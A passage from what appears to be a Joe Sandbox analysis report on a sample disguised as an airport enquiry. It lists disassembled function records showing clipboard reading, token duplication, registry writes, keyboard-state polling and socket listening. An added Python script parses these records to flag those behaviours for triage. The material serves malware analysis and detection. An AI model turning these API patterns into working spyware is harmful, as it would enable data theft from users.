            • API ID: StationTokenWindow$AdjustCloseHandleOpenPrivilegesProcess$DesktopDuplicateErrorLastLookupPrivilegeValue_memset
            • String ID: $default$winsta0
            • API String ID: 2063423040-1027155976
            • Opcode ID: 8317526bc846a6f6790afe7a1b5b7d7b5548b36717e8f422bd0d0ffd517c9b06
            • Instruction ID: d6012d44b4845594164b98e402f40612152d43a828b48bfc9a626529c270e412
            • Opcode Fuzzy Hash: 8317526bc846a6f6790afe7a1b5b7d7b5548b36717e8f422bd0d0ffd517c9b06
            • Instruction Fuzzy Hash: 4C814271900209AFDF11DFA4DC45AEEBB78EF04704F18415BFA28A6361DB718E19EB60
            APIs
            • OpenClipboard.USER32(00D0F910), ref: 00CF4284
            • IsClipboardFormatAvailable.USER32(0000000D), ref: 00CF4292
            • GetClipboardData.USER32(0000000D), ref: 00CF429A
            • CloseClipboard.USER32 ref: 00CF42A6
            • GlobalLock.KERNEL32(00000000), ref: 00CF42C2
            • CloseClipboard.USER32 ref: 00CF42CC
            • GlobalUnlock.KERNEL32(00000000,00000000), ref: 00CF42E1
            • IsClipboardFormatAvailable.USER32(00000001), ref: 00CF42EE
            • GetClipboardData.USER32(00000001), ref: 00CF42F6
            • GlobalLock.KERNEL32(00000000), ref: 00CF4303
            • GlobalUnlock.KERNEL32(00000000,00000000,?), ref: 00CF4337
            • CloseClipboard.USER32 ref: 00CF4447
            Memory Dump Source
            • Source File: 00000000.00000002.1687606854.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
            • Associated: 00000000.00000002.1687554635.0000000000C80000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687727691.0000000000D0F000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687727691.0000000000D35000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687791917.0000000000D3F000.00000004.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687806940.0000000000D48000.00000002.00000001.01000000.00000003.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_c80000_New Al Maktoum International Airport Enquiry Ref #2401249.jbxd
            Similarity
            • API ID: Clipboard$Global$Close$AvailableDataFormatLockUnlock$Open
            • String ID:
            • API String ID: 3222323430-0
            • Opcode ID: cbe6a92fd7db656e3686a89139fd7625d57acd0f395b1887d75621ca53899a63
            • Instruction ID: 70001743e1df7e623f17b49c93932524254e8eb2c138f50717fb896643c00c6b
            • Opcode Fuzzy Hash: cbe6a92fd7db656e3686a89139fd7625d57acd0f395b1887d75621ca53899a63
            • Instruction Fuzzy Hash: AD51AF35204306ABD325FF64EC86F7F77A8AF84B00F204529F65AD22A1DB70D9059B67
            APIs
            • FindFirstFileW.KERNEL32(?,?), ref: 00CEC9F8
            • FindClose.KERNEL32(00000000), ref: 00CECA4C
            • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00CECA71
            • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00CECA88
            • FileTimeToSystemTime.KERNEL32(?,?), ref: 00CECAAF
            • __swprintf.LIBCMT ref: 00CECAFB
            • __swprintf.LIBCMT ref: 00CECB3E
              • Part of subcall function 00C87F41: _memmove.LIBCMT ref: 00C87F82
            • __swprintf.LIBCMT ref: 00CECB92
              • Part of subcall function 00CA38D8: __woutput_l.LIBCMT ref: 00CA3931
            • __swprintf.LIBCMT ref: 00CECBE0
              • Part of subcall function 00CA38D8: __flsbuf.LIBCMT ref: 00CA3953
              • Part of subcall function 00CA38D8: __flsbuf.LIBCMT ref: 00CA396B
            • __swprintf.LIBCMT ref: 00CECC2F
            • __swprintf.LIBCMT ref: 00CECC7E
            • __swprintf.LIBCMT ref: 00CECCCD
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.1687606854.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
            • Associated: 00000000.00000002.1687554635.0000000000C80000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687727691.0000000000D0F000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687727691.0000000000D35000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687791917.0000000000D3F000.00000004.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687806940.0000000000D48000.00000002.00000001.01000000.00000003.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_c80000_New Al Maktoum International Airport Enquiry Ref #2401249.jbxd
            Similarity
            • API ID: __swprintf$FileTime$FindLocal__flsbuf$CloseFirstSystem__woutput_l_memmove
            • String ID: %02d$%4d$%4d%02d%02d%02d%02d%02d
            • API String ID: 3953360268-2428617273
            • Opcode ID: 0be40e6a1e4f54fc7c7f5d1b07971b4a5ad21ccffe7454ce8ba4634c8fbd17e2
            • Instruction ID: 06a239f0d69233119f1417fb2aab57c64c6b44e1685a65f06ab6eabf55f1992f
            • Opcode Fuzzy Hash: 0be40e6a1e4f54fc7c7f5d1b07971b4a5ad21ccffe7454ce8ba4634c8fbd17e2
            • Instruction Fuzzy Hash: E6A14CB2508344ABC714FBA5C8C5DBFB7ECEF94708F440929B586C2191EB34DA09DB66
            APIs
            • FindFirstFileW.KERNEL32(?,?,74DE8FB0,?,00000000), ref: 00CEF221
            • _wcscmp.LIBCMT ref: 00CEF236
            • _wcscmp.LIBCMT ref: 00CEF24D
            • GetFileAttributesW.KERNEL32(?), ref: 00CEF25F
            • SetFileAttributesW.KERNEL32(?,?), ref: 00CEF279
            • FindNextFileW.KERNEL32(00000000,?), ref: 00CEF291
            • FindClose.KERNEL32(00000000), ref: 00CEF29C
            • FindFirstFileW.KERNEL32(*.*,?), ref: 00CEF2B8
            • _wcscmp.LIBCMT ref: 00CEF2DF
            • _wcscmp.LIBCMT ref: 00CEF2F6
            • SetCurrentDirectoryW.KERNEL32(?), ref: 00CEF308
            • SetCurrentDirectoryW.KERNEL32(00D3A5A0), ref: 00CEF326
            • FindNextFileW.KERNEL32(00000000,00000010), ref: 00CEF330
            • FindClose.KERNEL32(00000000), ref: 00CEF33D
            • FindClose.KERNEL32(00000000), ref: 00CEF34F
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.1687606854.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
            • Associated: 00000000.00000002.1687554635.0000000000C80000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687727691.0000000000D0F000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687727691.0000000000D35000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687791917.0000000000D3F000.00000004.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687806940.0000000000D48000.00000002.00000001.01000000.00000003.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_c80000_New Al Maktoum International Airport Enquiry Ref #2401249.jbxd
            Similarity
            • API ID: Find$File$_wcscmp$Close$AttributesCurrentDirectoryFirstNext
            • String ID: *.*
            • API String ID: 1803514871-438819550
            • Opcode ID: f51b7c5bae62ca2ec0312aac3764bc8b0eb8cfb14c540fd450843aef7f3daaa2
            • Instruction ID: 45d78e334b82187d11f8111612a09b2ee7f16f4f42dfdb2e6d3b9bb39d144e35
            • Opcode Fuzzy Hash: f51b7c5bae62ca2ec0312aac3764bc8b0eb8cfb14c540fd450843aef7f3daaa2
            • Instruction Fuzzy Hash: 9E31E6766012996EDB20DBB5DC58BDE73ACEF09360F200179F964D31A0EB30DB46CA64
            APIs
            • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00D00BDE
            • RegCreateKeyExW.ADVAPI32(?,?,00000000,00D0F910,00000000,?,00000000,?,?), ref: 00D00C4C
            • RegCloseKey.ADVAPI32(00000000,00000001,00000000,00000000,00000000), ref: 00D00C94
            • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000002,?), ref: 00D00D1D
            • RegCloseKey.ADVAPI32(?), ref: 00D0103D
            • RegCloseKey.ADVAPI32(00000000), ref: 00D0104A
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.1687606854.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
            • Associated: 00000000.00000002.1687554635.0000000000C80000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687727691.0000000000D0F000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687727691.0000000000D35000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687791917.0000000000D3F000.00000004.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687806940.0000000000D48000.00000002.00000001.01000000.00000003.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_c80000_New Al Maktoum International Airport Enquiry Ref #2401249.jbxd
            Similarity
            • API ID: Close$ConnectCreateRegistryValue
            • String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
            • API String ID: 536824911-966354055
            • Opcode ID: f0adbf3868b9b3b7e0d5c8a485ed5581759dc37c77a9622bb666f47b2f2caa58
            • Instruction ID: df61fed2f8c830add52caaf805a298967a0e495eac7daf6cc353e55a152e7746
            • Opcode Fuzzy Hash: f0adbf3868b9b3b7e0d5c8a485ed5581759dc37c77a9622bb666f47b2f2caa58
            • Instruction Fuzzy Hash: DD0249752006119FCB14EF14C895B2ABBE5FF89714F08885DF98A9B3A2CB30ED41DB95
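            The four function records above that matter most to a triager are the AttachThreadInput/keybd_event foreground-forcing routine, the DuplicateTokenEx + OpenWindowStationW(winsta0)/OpenDesktopW(default) routine, the OpenClipboard/GetClipboardData routine and the RegCreateKeyExW/RegSetValueExW routine. The following script is an added example written for this page; it is not part of the Joe Sandbox report and not code from the sample. It parses the report's own "APIs" bullet lines (copied verbatim into RECORDS; the record labels fn_* and the rule names are mine) into structured calls, flags the four behaviours by API co-occurrence within one record, and decodes the literal arguments the report preserved: 0000000D and 00000001 passed to GetClipboardData are the standard Win32 CF_UNICODETEXT and CF_TEXT, and 00000012 passed to keybd_event is VK_MENU (Alt). One caveat on reading the hits: the report identifies the sample as a compiled AutoIt script, and the strings seen in these records (>>>AUTOIT NO CMDEXECUTE<<<, @GUI_DRAGID) together with the Alt-keypress AttachThreadInput pattern are characteristic of the AutoIt interpreter's own runtime, so a match here shows what the runtime can do, not necessarily what the embedded script calls.

```python
import re

# Sample input: "APIs" bullet lines copied verbatim from four function records in
# this report, grouped per record. The fn_* labels are mine, not the report's.
RECORDS = {
    "fn_00CBDA8E": """
• FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00CBDA8E
• SetForegroundWindow.USER32(?), ref: 00CBDAAE
• GetCurrentThreadId.KERNEL32 ref: 00CBDACB
• AttachThreadInput.USER32(?,00000000,00000001), ref: 00CBDAE8
• keybd_event.USER32(00000012,00000000), ref: 00CBDB1B
• AttachThreadInput.USER32(?,?,00000000), ref: 00CBDB71
""",
    "fn_00CD889B": """
  • Part of subcall function 00CD8CC3: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00CD8D3A
• DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?,?,?,?,00000001,?,?), ref: 00CD88ED
• OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 00CD8915
• OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 00CD8952
""",
    "fn_00CF4284": """
• OpenClipboard.USER32(00D0F910), ref: 00CF4284
• IsClipboardFormatAvailable.USER32(0000000D), ref: 00CF4292
• GetClipboardData.USER32(0000000D), ref: 00CF429A
• GlobalLock.KERNEL32(00000000), ref: 00CF42C2
• GetClipboardData.USER32(00000001), ref: 00CF42F6
""",
    "fn_00D00BDE": """
• RegCreateKeyExW.ADVAPI32(?,?,00000000,00D0F910,00000000,?,00000000,?,?), ref: 00D00C4C
• RegSetValueExW.ADVAPI32(00000001,?,00000000,00000002,?), ref: 00D00D1D
""",
}

# One bullet line: optional "Part of subcall function XXXX:" prefix, Api.MODULE,
# optional "(args)", then "ref: ADDRESS". Lines without parentheses also occur.
LINE_RE = re.compile(
    r"^\s*•\s+(?:Part of subcall function (?P<sub>[0-9A-F]+): )?"
    r"(?P<api>[A-Za-z_]\w*)\.(?P<mod>[A-Z0-9]+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-F]+)\s*$"
)

def parse_record(text):
    """Turn one record's bullet lines into call dicts; lines that do not match are skipped."""
    calls = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if m:
            calls.append({
                "api": m["api"], "module": m["mod"], "ref": m["ref"],
                "subcall": m["sub"],  # set when the report marks the call as inside a callee
                "args": [a for a in (m["args"] or "").split(",") if a],
            })
    return calls

# Behaviours to flag, as sets of APIs that must all appear in the same record.
RULES = {
    "forces foreground window (AttachThreadInput + synthetic key press)":
        {"AttachThreadInput", "keybd_event", "SetForegroundWindow"},
    "reads clipboard data": {"OpenClipboard", "GetClipboardData", "GlobalLock"},
    "duplicates a token and opens winsta0/default (RunAs-style)":
        {"DuplicateTokenEx", "OpenWindowStationW", "OpenDesktopW"},
    "writes a registry value": {"RegCreateKeyExW", "RegSetValueExW"},
}

# Standard Win32 constants used to decode the literal arguments the report kept.
CLIPBOARD_FORMATS = {0x1: "CF_TEXT", 0xD: "CF_UNICODETEXT"}
VIRTUAL_KEYS = {0x12: "VK_MENU"}

def hex_arg(call, index):
    """Return argument `index` as an int, or None when it is '?' or a non-numeric literal."""
    try:
        return int(call["args"][index], 16)
    except (IndexError, ValueError):
        return None

def match_rules(calls):
    present = {c["api"] for c in calls}
    return [label for label, needed in RULES.items() if needed <= present]

def decode_literals(calls):
    """Name the clipboard formats requested and the virtual keys synthesised via keybd_event."""
    formats, keys = [], []
    for c in calls:
        v = hex_arg(c, 0)
        if c["api"] == "GetClipboardData" and v is not None:
            formats.append(CLIPBOARD_FORMATS.get(v, f"0x{v:X}"))
        elif c["api"] == "keybd_event" and v is not None:
            keys.append(VIRTUAL_KEYS.get(v, f"0x{v:X}"))
    return formats, keys

def analyze(records):
    """Map record label -> flagged behaviours plus decoded clipboard formats and keys."""
    out = {}
    for label, text in records.items():
        calls = parse_record(text)
        formats, keys = decode_literals(calls)
        out[label] = {"behaviours": match_rules(calls), "clipboard": formats, "keys": keys}
    return out

if __name__ == "__main__":
    for label, result in analyze(RECORDS).items():
        print(label, result)
```

            To apply it to the rest of the report, paste each record's "APIs" bullets as one more RECORDS entry; the regex tolerates the indented "Part of subcall function" lines and the bullets that carry no argument list, and `subcall` tells you whether a flagged API is in the function itself or in a callee.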
            APIs
            • FindFirstFileW.KERNEL32(?,?,74DE8FB0,?,00000000), ref: 00CEF37E
            • _wcscmp.LIBCMT ref: 00CEF393
            • _wcscmp.LIBCMT ref: 00CEF3AA
              • Part of subcall function 00CE45C1: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 00CE45DC
            • FindNextFileW.KERNEL32(00000000,?), ref: 00CEF3D9
            • FindClose.KERNEL32(00000000), ref: 00CEF3E4
            • FindFirstFileW.KERNEL32(*.*,?), ref: 00CEF400
            • _wcscmp.LIBCMT ref: 00CEF427
            • _wcscmp.LIBCMT ref: 00CEF43E
            • SetCurrentDirectoryW.KERNEL32(?), ref: 00CEF450
            • SetCurrentDirectoryW.KERNEL32(00D3A5A0), ref: 00CEF46E
            • FindNextFileW.KERNEL32(00000000,00000010), ref: 00CEF478
            • FindClose.KERNEL32(00000000), ref: 00CEF485
            • FindClose.KERNEL32(00000000), ref: 00CEF497
            Strings
            Similarity
            • API ID: Find$File$_wcscmp$Close$CurrentDirectoryFirstNext$Create
            • String ID: *.*
            • API String ID: 1824444939-438819550
            APIs
              • Part of subcall function 00CD874A: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00CD8766
              • Part of subcall function 00CD874A: GetLastError.KERNEL32(?,00CD822A,?,?,?), ref: 00CD8770
              • Part of subcall function 00CD874A: GetProcessHeap.KERNEL32(00000008,?,?,00CD822A,?,?,?), ref: 00CD877F
              • Part of subcall function 00CD874A: HeapAlloc.KERNEL32(00000000,?,00CD822A,?,?,?), ref: 00CD8786
              • Part of subcall function 00CD874A: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00CD879D
              • Part of subcall function 00CD87E7: GetProcessHeap.KERNEL32(00000008,00CD8240,00000000,00000000,?,00CD8240,?), ref: 00CD87F3
              • Part of subcall function 00CD87E7: HeapAlloc.KERNEL32(00000000,?,00CD8240,?), ref: 00CD87FA
              • Part of subcall function 00CD87E7: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00CD8240,?), ref: 00CD880B
            • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00CD825B
            • _memset.LIBCMT ref: 00CD8270
            • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 00CD828F
            • GetLengthSid.ADVAPI32(?), ref: 00CD82A0
            • GetAce.ADVAPI32(?,00000000,?), ref: 00CD82DD
            • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00CD82F9
            • GetLengthSid.ADVAPI32(?), ref: 00CD8316
            • GetProcessHeap.KERNEL32(00000008,-00000008), ref: 00CD8325
            • HeapAlloc.KERNEL32(00000000), ref: 00CD832C
            • GetLengthSid.ADVAPI32(?,00000008,?), ref: 00CD834D
            • CopySid.ADVAPI32(00000000), ref: 00CD8354
            • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 00CD8385
            • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 00CD83AB
            • SetUserObjectSecurity.USER32(?,00000004,?), ref: 00CD83BF
            Similarity
            • API ID: HeapSecurity$AllocDescriptorLengthObjectProcessUser$Dacl$CopyErrorInformationInitializeLast_memset
            • String ID:
            • API String ID: 3996160137-0
            Strings
            Similarity
            • API ID:
            • String ID: ANY)$ANYCRLF)$BSR_ANYCRLF)$BSR_UNICODE)$CR)$CRLF)$LF)$LIMIT_MATCH=$LIMIT_RECURSION=$NO_AUTO_POSSESS)$NO_START_OPT)$UCP)$UTF)$UTF16)
            • API String ID: 0-4052911093
            APIs
              • Part of subcall function 00D010A5: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00D00038,?,?), ref: 00D010BC
            • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00D00737
              • Part of subcall function 00C89997: __itow.LIBCMT ref: 00C899C2
              • Part of subcall function 00C89997: __swprintf.LIBCMT ref: 00C89A0C
            • RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?), ref: 00D007D6
            • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000008), ref: 00D0086E
            • RegCloseKey.ADVAPI32(000000FE,000000FE,00000000,?,00000000), ref: 00D00AAD
            • RegCloseKey.ADVAPI32(00000000), ref: 00D00ABA
            Similarity
            • API ID: CloseQueryValue$BuffCharConnectRegistryUpper__itow__swprintf
            • String ID:
            • API String ID: 1240663315-0
            APIs
            • GetKeyboardState.USER32(?), ref: 00CE0241
            • GetAsyncKeyState.USER32(000000A0), ref: 00CE02C2
            • GetKeyState.USER32(000000A0), ref: 00CE02DD
            • GetAsyncKeyState.USER32(000000A1), ref: 00CE02F7
            • GetKeyState.USER32(000000A1), ref: 00CE030C
            • GetAsyncKeyState.USER32(00000011), ref: 00CE0324
            • GetKeyState.USER32(00000011), ref: 00CE0336
            • GetAsyncKeyState.USER32(00000012), ref: 00CE034E
            • GetKeyState.USER32(00000012), ref: 00CE0360
            • GetAsyncKeyState.USER32(0000005B), ref: 00CE0378
            • GetKeyState.USER32(0000005B), ref: 00CE038A
            Similarity
            • API ID: State$Async$Keyboard
            • String ID:
            • API String ID: 541375521-0
            APIs
              • Part of subcall function 00C89997: __itow.LIBCMT ref: 00C899C2
              • Part of subcall function 00C89997: __swprintf.LIBCMT ref: 00C89A0C
            • CoInitialize.OLE32 ref: 00CF8718
            • CoUninitialize.OLE32 ref: 00CF8723
            • CoCreateInstance.OLE32(?,00000000,00000017,00D12BEC,?), ref: 00CF8783
            • IIDFromString.OLE32(?,?), ref: 00CF87F6
            • VariantInit.OLEAUT32(?), ref: 00CF8890
            • VariantClear.OLEAUT32(?), ref: 00CF88F1
            Strings
            Similarity
            • API ID: Variant$ClearCreateFromInitInitializeInstanceStringUninitialize__itow__swprintf
            • String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
            • API String ID: 834269672-1287834457
            APIs
            Similarity
            • API ID: Clipboard$AllocCloseEmptyGlobalOpen
            • String ID:
            • API String ID: 1737998785-0
            APIs
              • Part of subcall function 00C848AE: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00C848A1,?,?,00C837C0,?), ref: 00C848CE
              • Part of subcall function 00CE4CD3: GetFileAttributesW.KERNEL32(?,00CE3947), ref: 00CE4CD4
            • FindFirstFileW.KERNEL32(?,?), ref: 00CE3ADF
            • DeleteFileW.KERNEL32(?,?,00000000,?,?,?,?), ref: 00CE3B87
            • MoveFileW.KERNEL32(?,?), ref: 00CE3B9A
            • DeleteFileW.KERNEL32(?,?,?,?,?), ref: 00CE3BB7
            • FindNextFileW.KERNEL32(00000000,00000010), ref: 00CE3BD9
            • FindClose.KERNEL32(00000000,?,?,?,?), ref: 00CE3BF5
            Strings
            Similarity
            • API ID: File$Find$Delete$AttributesCloseFirstFullMoveNameNextPath
            • String ID: \*.*
            • API String ID: 4002782344-1173974218
            APIs
              • Part of subcall function 00C87F41: _memmove.LIBCMT ref: 00C87F82
            • FindFirstFileW.KERNEL32(?,?,*.*,?,?,00000000,00000000), ref: 00CEF6AB
            • Sleep.KERNEL32(0000000A), ref: 00CEF6DB
            • _wcscmp.LIBCMT ref: 00CEF6EF
            • _wcscmp.LIBCMT ref: 00CEF70A
            • FindNextFileW.KERNEL32(?,?), ref: 00CEF7A8
            • FindClose.KERNEL32(00000000), ref: 00CEF7BE
            Strings
            Similarity
            • API ID: Find$File_wcscmp$CloseFirstNextSleep_memmove
            • String ID: *.*
            • API String ID: 713712311-438819550
            Strings
            Similarity
            • API ID:
            • String ID: ERCP$VUUU$VUUU$VUUU$VUUU
            • API String ID: 0-1546025612
            APIs
            Similarity
            • API ID: _memmove
            • String ID:
            • API String ID: 4104443479-0
            APIs
              • Part of subcall function 00CD8CC3: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00CD8D0D
              • Part of subcall function 00CD8CC3: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00CD8D3A
              • Part of subcall function 00CD8CC3: GetLastError.KERNEL32 ref: 00CD8D47
            • ExitWindowsEx.USER32(?,00000000), ref: 00CE549B
            Strings
            Similarity
            • API ID: AdjustErrorExitLastLookupPrivilegePrivilegesTokenValueWindows
            • String ID: $@$SeShutdownPrivilege
            • API String ID: 2234035333-194228
            APIs
            • socket.WSOCK32(00000002,00000001,00000006,?,00000002,00000000), ref: 00CF65EF
            • WSAGetLastError.WSOCK32(00000000), ref: 00CF65FE
            • bind.WSOCK32(00000000,?,00000010), ref: 00CF661A
            • listen.WSOCK32(00000000,00000005), ref: 00CF6629
            • WSAGetLastError.WSOCK32(00000000), ref: 00CF6643
            • closesocket.WSOCK32(00000000,00000000), ref: 00CF6657
            Similarity
            • API ID: ErrorLast$bindclosesocketlistensocket
            • String ID:
            • API String ID: 1279440585-0
            APIs
              • Part of subcall function 00CA0FF6: std::exception::exception.LIBCMT ref: 00CA102C
              • Part of subcall function 00CA0FF6: __CxxThrowException@8.LIBCMT ref: 00CA1041
            • _memmove.LIBCMT ref: 00CD062F
            • _memmove.LIBCMT ref: 00CD0744
            • _memmove.LIBCMT ref: 00CD07EB
            Similarity
            • API ID: _memmove$Exception@8Throwstd::exception::exception
            • String ID:
            • API String ID: 1300846289-0
            APIs
              • Part of subcall function 00C82612: GetWindowLongW.USER32(?,000000EB), ref: 00C82623
            • DefDlgProcW.USER32(?,?,?,?,?), ref: 00C819FA
            • GetSysColor.USER32(0000000F), ref: 00C81A4E
            • SetBkColor.GDI32(?,00000000), ref: 00C81A61
              • Part of subcall function 00C81290: DefDlgProcW.USER32(?,00000020,?), ref: 00C812D8
            Similarity
            • API ID: ColorProc$LongWindow
            • String ID:
            • API String ID: 3744519093-0
            APIs
              • Part of subcall function 00CF80A0: inet_addr.WSOCK32(00000000,?,00000000,?,?,?,00000000), ref: 00CF80CB
            • socket.WSOCK32(00000002,00000002,00000011,?,?,00000000), ref: 00CF6AB1
            • WSAGetLastError.WSOCK32(00000000), ref: 00CF6ADA
            • bind.WSOCK32(00000000,?,00000010), ref: 00CF6B13
            • WSAGetLastError.WSOCK32(00000000), ref: 00CF6B20
            • closesocket.WSOCK32(00000000,00000000), ref: 00CF6B34
            Similarity
            • API ID: ErrorLast$bindclosesocketinet_addrsocket
            • String ID:
            • API String ID: 99427753-0
            APIs
            Similarity
            • API ID: Window$EnabledForegroundIconicVisibleZoomed
            • String ID:
            • API String ID: 292994002-0
            • Opcode ID: f50ae0e4826800aaba9cbb110f66a856fe873fb5ea78581acb9a391f225469f5
            • Instruction ID: 34c3cfd4f87e5b51c20ead8c304445b3e9504059a709c47a7abad577b76655f8
            • Opcode Fuzzy Hash: f50ae0e4826800aaba9cbb110f66a856fe873fb5ea78581acb9a391f225469f5
            • Instruction Fuzzy Hash: E3119031700A116BE7216F26EC44B6B7798EF44721B984429E84ED7281CB7199018AB5
            APIs
            • LoadLibraryA.KERNEL32(kernel32.dll,?,00CC1D88,?), ref: 00CFC312
            • GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryW), ref: 00CFC324
            Memory Dump Source
            • Source File: 00000000.00000002.1687606854.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
            • Associated: 00000000.00000002.1687554635.0000000000C80000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687727691.0000000000D0F000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687727691.0000000000D35000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687791917.0000000000D3F000.00000004.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687806940.0000000000D48000.00000002.00000001.01000000.00000003.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_c80000_New Al Maktoum International Airport Enquiry Ref #2401249.jbxd
            Similarity
            • API ID: AddressLibraryLoadProc
            • String ID: GetSystemWow64DirectoryW$kernel32.dll
            • API String ID: 2574300362-1816364905
            • Opcode ID: 6d0a52adf2d8728f6b1a6eb5ec10faac40e6d86de0b8afe58a087d9bd7b64823
            • Instruction ID: fde74425f7e518a4965113a9b662a04283fecb6405357371c86cca3c357f5fed
            • Opcode Fuzzy Hash: 6d0a52adf2d8728f6b1a6eb5ec10faac40e6d86de0b8afe58a087d9bd7b64823
            • Instruction Fuzzy Hash: 0BE08C7430030BCFCB344F25C844BD676D4EB08394FA08439E9A9D2660E7B0D844CAB1
            Memory Dump Source
            • Source File: 00000000.00000002.1687606854.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
            • Associated: 00000000.00000002.1687554635.0000000000C80000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687727691.0000000000D0F000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687727691.0000000000D35000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687791917.0000000000D3F000.00000004.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687806940.0000000000D48000.00000002.00000001.01000000.00000003.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_c80000_New Al Maktoum International Airport Enquiry Ref #2401249.jbxd
            Similarity
            • API ID: __itow__swprintf
            • String ID:
            • API String ID: 674341424-0
            • Opcode ID: 7e16691b8c8eed2be095dfc459e19925a41f0c12daea6a6a78be5d6cf758d0dc
            • Instruction ID: 346f7e93f9205c378e23c96f87cbefc9ac5e9cc44512273e5202ff5b604ad659
            • Opcode Fuzzy Hash: 7e16691b8c8eed2be095dfc459e19925a41f0c12daea6a6a78be5d6cf758d0dc
            • Instruction Fuzzy Hash: DB2288716083419FCB24EF64C885B6FB7E4EF88704F14491DF99A97291DB30EA05DB92
            APIs
            • CreateToolhelp32Snapshot.KERNEL32 ref: 00CFF151
            • Process32FirstW.KERNEL32(00000000,?), ref: 00CFF15F
              • Part of subcall function 00C87F41: _memmove.LIBCMT ref: 00C87F82
            • Process32NextW.KERNEL32(00000000,?), ref: 00CFF21F
            • CloseHandle.KERNEL32(00000000,?,?,?), ref: 00CFF22E
            Memory Dump Source
            • Source File: 00000000.00000002.1687606854.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
            • Associated: 00000000.00000002.1687554635.0000000000C80000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687727691.0000000000D0F000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687727691.0000000000D35000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687791917.0000000000D3F000.00000004.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687806940.0000000000D48000.00000002.00000001.01000000.00000003.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_c80000_New Al Maktoum International Airport Enquiry Ref #2401249.jbxd
            Similarity
